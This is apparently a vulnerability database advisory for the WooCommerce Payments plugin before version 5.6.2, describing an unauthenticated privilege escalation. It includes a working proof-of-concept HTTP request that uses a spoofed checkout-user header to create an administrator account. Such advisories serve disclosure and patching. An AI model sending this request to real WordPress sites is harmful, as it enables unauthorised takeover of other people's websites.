wpvulndb WPVDB-ID: 0F78A245-866C-462E-BD23-43DFADB57072
History: Mar 23, 2023 - 12:00 a.m.

WooCommerce Payments < 5.6.2 - Unauthenticated Privilege Escalation

wpscan.com
94
Tags: woocommerce payments, unauthenticated, privilege escalation, flaw, admin account

EPSS: 0.924 (High)
EPSS Percentile: 99.0%

The plugin has a flaw allowing unauthenticated attackers to create an admin account and take over the blog.

PoC

POST /wp-json/wp/v2/users HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Wcpay-Platform-Checkout-User: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/json

{
  "username": "attacker",
  "email": "[email protected]",
  "password": "attacker-pwd",
  "roles": ["administrator"]
}

Affected software (CPE)
Name: woocommerce-payments
Operator: lt (less than)
Version: 5.6.2
